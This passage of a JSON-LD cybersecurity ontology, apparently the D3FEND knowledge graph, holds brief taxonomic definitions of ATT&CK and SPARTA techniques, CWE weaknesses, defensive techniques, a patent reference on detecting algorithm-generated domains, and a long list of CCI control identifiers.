      "d3f:attack-id": "T0885",
      "d3f:definition": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below.",
      "rdfs:label": "Commonly Used Port - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCommandAndControlTechnique"
      },
      "skos:prefLabel": "Commonly Used Port"
    },
    {
      "@id": "d3f:PlatformUptimeMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PlatformUptimeMonitoring"
      ],
      "d3f:d3fend-id": "D3-PUM",
      "d3f:definition": "Monitor the amount of time since the last power cycle or restart.",
      "d3f:kb-article": "## How it works\nMonitoring the time since the last power cycle or restart alerts operators to unexpected restarts and their frequency. This can indicate potential issues or malicious activity, and provides valuable information for forensic investigations.\n\n## Considerations\nThe source of the variable may be mutable depending on the platform, and the provenance of the value.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:monitors": {
        "@id": "d3f:PlatformUptime"
      },
      "rdfs:label": "Platform Uptime Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:Neaf094c777dd4175896b9943e3c2c66d"
        }
      ]
    },
    {
      "@id": "_:Neaf094c777dd4175896b9943e3c2c66d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PlatformUptime"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingAlgorithm-generatedDomains_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150264070A1"
      },
      "d3f:kb-abstract": "A method and system for detecting algorithm-generated domains (AGDs) is disclosed wherein domain names requested by an internal host are categorized or classified using curated data sets, active services (e.g. Internet services), and certainty scores to match domain names to domain names or IP addresses used by command and control servers.",
      "d3f:kb-author": "James Patrick HARLACHER; Aditya Sood; Oskar Ibatullin",
      "d3f:kb-mitre-analysis": "This patent describes detecting algorithm generated domains (AGD). DNS requests and responses are analyzed by first checking whether the domain matches existing data sets that specify different types of AGDs with known characteristics, such as Evil Twin Domains, Sinkholed domains, sleeper cells, ghost domains, parked domains, and/or bulk-registered domains. In addition to comparing domains against known data sets, the following information is collected to perform analysis:\n\n* IP Information: checks for information known about the IP addresses returned in the DNS response, including the number of IP addresses returned, the registered owners of the IP addresses, or different IP addresses returned for the same domain (IP fluxing)\n* Domain Registration: examines the domain registration date, domain update date, domain expiration date, registrant identity, and authorized name servers associated with a specific domain name.\n* Domain Popularity: provides information on the popularity of a domain name.\n\nBased on analysis of these factors a score is developed; if the score is above a certain threshold, an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for detecting algorithm-generated domains",
      "rdfs:label": "Reference - Method and system for detecting algorithm-generated domains - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:T1080",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1080",
      "d3f:definition": "Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.",
      "d3f:modifies": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "Taint Shared Content",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N65f45f32a1634ea7abc82521ff870876"
        }
      ]
    },
    {
      "@id": "_:N65f45f32a1634ea7abc82521ff870876",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:WindowsNtDuplicateToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtDuplicateToken function creates a handle to a new access token that duplicates an existing token. This function can create either a primary token or an impersonation token.",
      "rdfs:label": "Windows NtDuplicateToken",
      "rdfs:seeAlso": [
        {
          "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntduplicatetoken"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICopyToken"
      }
    },
    {
      "@id": "d3f:CWE-330",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-330",
      "d3f:definition": "The product uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.",
      "rdfs:label": "Use of Insufficiently Random Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-1174",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1174",
      "d3f:definition": "The ASP.NET application does not use, or incorrectly uses, the model validation framework.",
      "rdfs:label": "ASP.NET Misconfiguration: Improper Model Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:ZeroClientComputer",
      "@type": "owl:Class",
      "d3f:definition": "Zero client is also referred as ultra thin client, contains no moving parts but centralizes all processing and storage to just what is running on the server. As a result, it requires no local driver to install, no patch management, and no local operating system licensing fees or updates. The device consumes very little power and is tamper-resistant and completely incapable of storing any data locally, providing a more secure endpoint.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Thin_client#Zero_client"
      },
      "rdfs:label": "Zero Client Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:ThinClientComputer"
      }
    },
    {
      "@id": "d3f:Voting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VOT",
      "d3f:definition": "Voting is another form of ensembling.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Voting",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-20",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-20",
      "d3f:definition": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Input Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-707"
        },
        {
          "@id": "_:N886d5daf08054c759db4c7f5a9319a9d"
        }
      ]
    },
    {
      "@id": "_:N886d5daf08054c759db4c7f5a9319a9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:T1624.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1624.001",
      "d3f:definition": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.",
      "rdfs:label": "Broadcast Receivers - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1624"
      },
      "skos:prefLabel": "Broadcast Receivers"
    },
    {
      "@id": "d3f:T1055.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.005",
      "d3f:definition": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Thread Local Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Nfe47177aeded4ec59e05204de45b11aa"
        }
      ]
    },
    {
      "@id": "_:Nfe47177aeded4ec59e05204de45b11aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-260",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-260",
      "d3f:definition": "The product stores a password in a configuration file that might be accessible to actors who do not know the password.",
      "rdfs:label": "Password in Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:Median",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MED",
      "d3f:definition": "The middle value that separates the higher half from the lower half of the data set. The median and the mode are the only measures of central tendency that can be used for ordinal data, in which values are ranked relative to each other but are not measured absolutely.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Median",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "rdfs:label": "AC-3"
    },
    {
      "@id": "d3f:OTSynchronizeTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Used to align timing mechanisms.",
      "rdfs:comment": "example",
      "rdfs:label": "OT Synchronize Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:OperatingSystemConfigurationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system configuration file is a file used to configure the operating system.",
      "rdfs:label": "Operating System Configuration File",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "d3f:OperatingSystem"
        },
        {
          "@id": "dbr:Configuration_file"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "d3f:OperatingSystemFile"
        }
      ],
      "skos:altLabel": "System Configuration File"
    },
    {
      "@id": "d3f:UserAccountAttachPolicyEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an IAM policy is attached to a user account.",
      "rdfs:label": "User Account Attach Policy Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N50e545732d2a40c3b4c9ba904335b0a1"
        }
      ]
    },
    {
      "@id": "_:N50e545732d2a40c3b4c9ba904335b0a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:Microcode",
      "@type": "owl:Class",
      "d3f:definition": "Microcode is a computer hardware technique that interposes a layer of organization between the CPU hardware and the programmer-visible instruction set architecture of the computer. As such, the microcode is a layer of hardware-level instructions that implement higher-level machine code instructions or internal state machine sequencing in many digital processing elements.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Microcode"
      },
      "rdfs:label": "Microcode",
      "rdfs:subClassOf": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1219.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1219.003",
      "d3f:definition": "An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment.",
      "rdfs:label": "Remote Access Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1219"
      }
    },
    {
      "@id": "d3f:IA-0004.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0004.02",
      "d3f:definition": "Threat actors may target the spacecraft’s secondary (backup) RF receive path, often a differently sourced radio, alternate antenna/feed, or cross-strapped front end that is powered or enabled under specific modes. Threat actors map when the backup comes into play (safing, antenna obscuration, maintenance, link degradation) and what command dictionaries, framing, or authentication it expects. If the backup receiver has distinct waveforms, counters, or vendor defaults, the attacker can inject traffic that is accepted only when that path is active, limiting exposure during nominal ops. Forcing conditions that enable the backup, jamming the primary, exploiting geometry, or waiting for routine tests, creates the window for first execution. The result is a foothold gained through a rarely used RF path, exploiting differences in implementation and operational cadence between primary and standby receive chains.",
      "rdfs:label": "Receiver - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0004/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0004"
      },
      "skos:prefLabel": "Receiver"
    },
    {
      "@id": "d3f:carries",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x carries y: The entity x serves as the bearer or link for information y, enabling y to be stored, transported, or communicated such that y can be recovered or interpreted from x",
      "rdfs:label": "carries",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateThread",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:CCICatalog_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ControlCorrelationIdentifierCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://public.cyber.mil/stigs/cci/"
      },
      "d3f:has-member": [
        {
          "@id": "d3f:CCI-000015_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000016_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000017_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000018_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000020_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000022_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000025_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000027_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000029_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000030_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000032_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000034_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000035_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000037_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000040_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000044_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000047_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000056_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000057_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000058_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000060_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000066_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000067_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000068_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000071_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000139_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000143_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000144_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000162_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000163_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000164_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000185_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000186_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000187_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000192_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000193_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000194_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000195_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000196_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000197_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000198_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000199_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000200_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000205_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000213_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000218_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000219_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000226_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000346_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000352_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000374_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000381_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000382_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000386_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000417_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000663_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000764_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000765_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000766_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000767_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000768_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000771_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000772_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000774_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000776_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000804_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000831_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000877_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000880_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000884_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000888_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001009_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001019_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001067_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001069_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001082_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001083_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001084_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001085_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001086_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001087_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001089_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001090_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001092_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001094_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001096_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001100_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001109_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001111_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001115_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001117_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001118_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001124_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001125_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001127_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001128_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001133_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001144_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001145_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001146_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001147_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001150_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001166_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001169_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001170_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001178_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001185_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001199_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001200_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001210_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001211_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001233_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001237_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001239_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001242_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001262_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001297_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001305_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001310_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001350_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001352_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001356_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001368_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001372_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001373_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001374_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001376_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001377_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001399_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001400_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001401_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001403_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001404_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001405_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001414_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001424_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001425_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001426_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001427_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001428_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001436_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001452_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001453_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001454_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001493_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001494_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001495_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001496_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001499_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001555_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001556_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001557_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001574_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001589_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001619_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001632_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001662_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001668_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001677_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001682_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001683_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001684_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001685_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001686_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001695_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001744_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001749_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001762_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001764_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001767_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001774_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001811_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001812_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001813_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001855_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001858_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001936_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001937_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001941_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001953_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001954_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001957_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001991_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002005_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002009_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002010_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002015_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002016_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002041_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002145_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002165_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002169_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002178_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002179_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002201_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002205_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002207_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002211_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002218_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002233_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002235_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002238_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002262_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002263_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002264_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002272_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002277_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002281_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002282_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002283_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002284_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002289_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002290_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002302_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002306_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002307_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002308_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002309_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002322_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002346_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002347_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002353_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002355_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002357_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002358_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002359_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002361_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002363_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002364_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002381_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002382_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002384_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002385_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002394_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002397_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002400_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002403_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002409_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002411_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002420_v2022-04-05"
        },
        {
